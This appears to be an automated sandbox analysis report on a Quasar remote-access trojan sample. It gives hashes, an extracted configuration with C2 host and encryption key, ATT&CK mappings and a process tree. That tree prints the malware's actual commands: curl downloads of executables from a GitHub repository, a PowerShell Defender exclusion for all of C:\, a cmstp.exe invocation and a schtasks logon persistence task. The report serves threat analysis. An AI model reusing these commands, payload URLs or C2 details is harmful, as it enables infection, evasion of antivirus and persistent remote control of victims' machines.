quasar | 9189fc7f2a99cbb9c2ea6d2486b3aef126e40539d18465851a7ce9ba3b3bfd7d

General

Target

SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe
Size

215KB
MD5

64bf69a02b9ec0727d0a03076d212b66
SHA1

e9f97d48a3c76355a66e408470d6744dfada8623
SHA256

9189fc7f2a99cbb9c2ea6d2486b3aef126e40539d18465851a7ce9ba3b3bfd7d
SHA512

0069ab640b8ec75a5589f8d1ef1b63fbbe8ce9c86a8ce6ed127101b3eaf319f5f998c0a8089af27b14276adb4fcd0048c6b947b7aa04cc06bcd2e7d72b8ffd6d
SSDEEP

3072:9CFLa6pQN86HH6hr4HyYLNlb7kwwORjt4b4pMBCLzzPtks82KOSuqnPSy6z83:9CXc88ahr4HPLnkjkMQtKlPSD43

Score

10^/10

quasar office04 execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

epotiz-56104.portmap.host:56104

Mutex

dff263c5-5f46-4ebd-b314-af4f281b1196

Attributes

encryption_key
91AE6D01E5588CB2EC925069EE1425C401902592
install_name
Realtek HD Audio Manager.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Realtek HD Audio Manager
subdirectory
Realtek HD Audio Manager

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e767-21.dat	family_quasar
behavioral2/memory/4032-23-0x0000000000FC0000-0x00000000012E4000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3712	powershell.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
34	6004	curl.exe
46	2216	curl.exe
55	2472	curl.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	cheese.exe

Executes dropped EXE 3 IoCs

pid	Process
6108	ConsoleApplication4.exe
2168	cheese.exe
4032	Realtek HD Audio Manager.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
55	raw.githubusercontent.com
33	raw.githubusercontent.com
34	raw.githubusercontent.com
42	raw.githubusercontent.com
46	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3712	powershell.exe
3712	powershell.exe
3712	powershell.exe
6108	ConsoleApplication4.exe
6108	ConsoleApplication4.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeDebugPrivilege	4032	Realtek HD Audio Manager.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 4288	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	90
PID 1928 wrote to memory of 4288	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	90
PID 4288 wrote to memory of 6004	4288	cmd.exe	92
PID 4288 wrote to memory of 6004	4288	cmd.exe	92
PID 1928 wrote to memory of 5332	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	99
PID 1928 wrote to memory of 5332	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	99
PID 5332 wrote to memory of 4932	5332	cmd.exe	101
PID 5332 wrote to memory of 4932	5332	cmd.exe	101
PID 1928 wrote to memory of 5400	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	102
PID 1928 wrote to memory of 5400	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	102
PID 5400 wrote to memory of 2216	5400	cmd.exe	105
PID 5400 wrote to memory of 2216	5400	cmd.exe	105
PID 1928 wrote to memory of 6108	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	106
PID 1928 wrote to memory of 6108	1928	SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe	106
PID 6108 wrote to memory of 4996	6108	ConsoleApplication4.exe	108
PID 6108 wrote to memory of 4996	6108	ConsoleApplication4.exe	108
PID 2168 wrote to memory of 3712	2168	cheese.exe	112
PID 2168 wrote to memory of 3712	2168	cheese.exe	112
PID 2168 wrote to memory of 2100	2168	cheese.exe	113
PID 2168 wrote to memory of 2100	2168	cheese.exe	113
PID 2100 wrote to memory of 2472	2100	cmd.exe	116
PID 2100 wrote to memory of 2472	2100	cmd.exe	116
PID 2168 wrote to memory of 4032	2168	cheese.exe	117
PID 2168 wrote to memory of 4032	2168	cheese.exe	117
PID 4032 wrote to memory of 1568	4032	Realtek HD Audio Manager.exe	118
PID 4032 wrote to memory of 1568	4032	Realtek HD Audio Manager.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win64.MalwareX-gen.9836.14163.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/ConsoleApplication4.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\ConsoleApplication4.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\system32\curl.exe
    curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/ConsoleApplication4.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\ConsoleApplication4.exe"
    3⤵
    - Downloads MZ/PE file
    PID:6004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/crazy.bin" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5332
- - C:\Windows\system32\curl.exe
    curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/crazy.bin" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:4932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/cheese.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\cheese.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5400
- - C:\Windows\system32\curl.exe
    curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/cheese.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\cheese.exe"
    3⤵
    - Downloads MZ/PE file
    PID:2216
- C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\ConsoleApplication4.exe
  "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\ConsoleApplication4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:6108
- - C:\Windows\SYSTEM32\cmstp.exe
    cmstp.exe "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin"
    3⤵
    PID:4996

C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\cheese.exe
"C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\cheese.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/Realtek%20HD%20Audio%20Manager.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\system32\curl.exe
    curl -L "https://github.com/00094/String-Remover/raw/refs/heads/main/Realtek%20HD%20Audio%20Manager.exe" -o "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe"
    3⤵
    - Downloads MZ/PE file
    PID:2472
- C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe
  "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "Realtek HD Audio Manager" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vdaqtcft.uaa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\ConsoleApplication4.exe

Filesize
18KB

MD5
250c248e5e56aa465b0440ade276d482

SHA1
2c0b8befa55fb1393ee9d5b031663c76450ea629

SHA256
97691758613fbbaac193f76053c7aa4cc2889e33f8a2827e736a192eb7c2bd66

SHA512
8ccb638f265659ffaeeb0cf7f270491b5e78726ad5078a249660f7072cbad41d6a4d2f5b81de6f091cb12283adb852efaf868ec00ac81c82a71fc7134aaddf9c

Download Submit
C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\Realtek HD Audio Manager.exe

Filesize
3.1MB

MD5
20eeb65678c6fcffcc30cc2fc429f572

SHA1
182305533e4a842da880cf204604456e838878db

SHA256
4266be83abea2867cfa44836d014983f658f688a1f96fe74bed4b2b5f0d59c1b

SHA512
f32cc7a2b5fde293bc9bb6e99c75b92d5725297f128a945f6edcb9ab4d6579ca388370bca5ddff1b5532d6b5e248641bf232a71af93aa031cb86097ed745a872

Download Submit
C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\cheese.exe

Filesize
21KB

MD5
d26086bdf3d51cbf6784f682a69e01ed

SHA1
895d47f55a31ae1c071a4997a4fc0753491f24f1

SHA256
08661c8603d30562bc0067bba1c07d7840b1c963eee8e1a1ee553062e998e1f5

SHA512
54b989a6c6114a9a45fbb0a14a4875e4c9cd460d8257783ba01696a5b29d059abbeaca918a23e0341b9de1f1abec0e99bb653c38c8233d4945869737330c3afc

Download Submit
C:\Users\Admin\AppData\Roaming\Realtek HD Audio Manager\crazy.bin

Filesize
185B

MD5
f9c222765af6f31aef2bdb83d89a1d27

SHA1
e2cbe325fd11eb023f7dd484b6861a72400da701

SHA256
bbf5b784744f652fb8c91cee729bc713d74ecf7753432ccecf2be022e95e2246

SHA512
4e0f2d4a31164c1101048615525661b3a146d325d022c325abe0746894dce12f39e05c5bd1827f501013fa0d2f87ab46c671b611015a5264eb58a4abc4a5dfeb

Download Submit
memory/3712-8-0x00000211FE580000-0x00000211FE5A2000-memory.dmp

Filesize
136KB

Download
memory/4032-23-0x0000000000FC0000-0x00000000012E4000-memory.dmp

Filesize
3.1MB

Download
memory/4032-24-0x0000000003570000-0x00000000035C0000-memory.dmp

Filesize
320KB

Download
memory/4032-25-0x000000001C690000-0x000000001C742000-memory.dmp

Filesize
712KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads